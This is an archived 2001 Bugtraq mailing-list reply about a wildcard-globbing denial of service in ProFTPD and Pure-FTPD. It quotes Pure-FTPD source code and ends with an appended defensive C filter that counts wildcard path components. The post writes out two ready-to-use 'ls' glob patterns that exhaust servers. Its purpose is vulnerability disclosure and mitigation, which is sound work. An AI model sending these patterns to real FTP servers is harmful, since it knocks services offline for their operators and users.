[19672] in bugtraq
Re: Multiple vendors FTP denial of service
daemon@ATHENA.MIT.EDU (Daniel Roesen)
Fri Mar 16 11:59:11 2001
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010315233808.A25681@hydra.entire-systems.com>
Date: Thu, 15 Mar 2001 23:38:08 +0100
Reply-To: droesen@entire-systems.com
From: Daniel Roesen <dr@BOFH.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010315093409.A5565@synchron.home.rtchat.com>; from j@4U.NET on Thu, Mar 15, 2001 at 09:34:09AM +0100
[NOTE to the fellow readership: "Frank DENIS (Jedi/Sector One)" is
the author of Pure-FTPD]
On Thu, Mar 15, 2001 at 09:34:09AM +0100, Frank DENIS (Jedi/Sector One) wrote:
> - Proftpd built-in 'ls' command has a globbing bug that allows remote
> denial-of-service.
>
> Here's a simple exploit, tested on the Proftpd site :
That's really great. Very convenient for you to run DoS attacks against
the main distribution site of ProFTPD.
> - PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
> expression to *" and the 'ls *' output.
It is not vulnerable to the simple attack, but to more "sophisticated"
attacks it is. 20 seconds spent looking into the source reveals:
from pure-ftpd-0.96/src/ls.c:
    /* try to defend against wildcard denial-of-service attack */
    doshack = strstr(arg, "/../");
    if (doshack) {
        /* first eliminate those at the start */
        if (doshack == arg) {
            while (strncmp(arg, "/../", 4) == 0) {
                size_t cpa = strlen(arg + 4) + 1U;

                memmove(arg, arg + 4, cpa);
            }
            doshack = strstr(arg, "/../");
        }
        /* next, eliminate /../ in the middle of the string */
        while (doshack) {
            char *nextcomponent = doshack + 4;
            size_t cpa;

            if (doshack != arg && *doshack == '/')
                doshack--;
            while (doshack != arg && *doshack != '/')
                doshack--;
            if (*doshack == '/')
                doshack++;
            cpa = strlen(nextcomponent) + 1U;
            memmove(doshack, nextcomponent, cpa);
            doshack = strstr(arg, "/../");
        }
        addreply(0, "Simplified wildcard expression to %s", arg);
    }
So your defense is just removing "/../" sequences. That's not enough.
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
These lead exactly to the same problems ProFTPD has. You've only gone
half-way. Thanks to John Morrissey <jwm@horde.net> for verifying this
on a test installation of Pure-FTPD.
BTW: Flood (Jesse Sipprell <jss@inflicted.net>) found that you are using
unprotected calls to glob() all over the place and concludes that it
would be trivial to launch this attack against other FTP commands (DELE
etc.) against Pure-FTPD as well.
I guess you should re-think your Skill inventory on Sourceforge:
http://sourceforge.net/people/viewprofile.php?user_id=37669
Same with the statement "Unlike other popular FTP servers, it has no
known security flaw" on the Pure-FTPD homepage.
King for a day, fool for a lifetime, eh?
> Maintainers of vulnerable servers have been warned of this bug.
Yes. 15 *minutes* before you sent this posting off to Bugtraq. I'm not
going into the usual discussion about how to handle security problems.
May the fellow readership judge for themselves how responsible your
behaviour was.
You may want to take a look at http://www.wiretrip.net/rfp/policy.html
For ProFTPD users: an official response with a workaround to the problem
is being released right now here to Bugtraq.
Daniel
ProFTPD RPM packaging maintainer
(droesen@entire-systems.com for ProFTPD related email)
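Added example, not code from Pure-FTPD, ProFTPD or this post: a pre-glob() filter that counts wildcard-bearing path components instead of looking for a literal "/../". The two patterns quoted above contain no "/../" at all, so the ls.c loop leaves them untouched; what hurts is that ".*" matches both "." and "..", so every wildcard component lets glob() re-enter the parent directory and the number of paths it walks grows with the product of the components. The function names, the limit of four wildcard components and the benign sample arguments are assumptions chosen for illustration.

```c
/* Added example: reject glob arguments with too many wildcard components.
 * Not Pure-FTPD or ProFTPD code; names and the limit are illustrative. */
#include <stdio.h>
#include <string.h>

/* The two patterns from the post, embedded as constructed test input. */
const char *const POST_PATTERN_1 =
    ".*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/";
const char *const POST_PATTERN_2 =
    "*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/";

/* A path component is "wild" if glob() would expand it against a directory. */
static int component_is_wild(const char *start, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (start[i] == '*' || start[i] == '?' || start[i] == '[')
            return 1;
    }
    return 0;
}

/* Count the '/'-separated components of arg that contain a metacharacter.
 * glob() expands each such component in every directory reached by the
 * previous ones; ".*" also matches "." and "..", so with many wild
 * components the search tree explodes without any "/../" in the text. */
int count_wild_components(const char *arg)
{
    int wild = 0;
    const char *p = arg;

    while (*p) {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);

        if (component_is_wild(p, len))
            wild++;
        if (!slash)
            break;
        p = slash + 1;
    }
    return wild;
}

/* 1 if arg may be handed to glob(), 0 if the server should refuse it.
 * max_wild is a policy knob (assumed value 4 below); real listings rarely
 * need more than one or two wildcard directory levels. */
int glob_arg_ok(const char *arg, int max_wild)
{
    return count_wild_components(arg) <= max_wild;
}

int main(void)
{
    const char *samples[] = {
        POST_PATTERN_1,
        POST_PATTERN_2,
        "*.c",               /* constructed benign argument */
        "pub/*/README*",     /* constructed benign argument */
        "/../etc/passwd",    /* has "/../" but no wildcard at all */
    };
    const int max_wild = 4;

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *arg = samples[i];
        printf("%-60s has_dotdot=%d wild=%2d -> %s\n", arg,
               strstr(arg, "/../") != NULL, count_wild_components(arg),
               glob_arg_ok(arg, max_wild) ? "accept" : "reject");
    }
    return 0;
}
```

Call glob_arg_ok() before every glob() the daemon issues (LIST, NLST, DELE and the rest), not only in the ls path, and answer a rejected argument with a 550 instead of expanding it. A component count is a coarse gate; where the C library offers a match-limit flag (BSD's GLOB_LIMIT) use that as a second bound on the work a single command can cause.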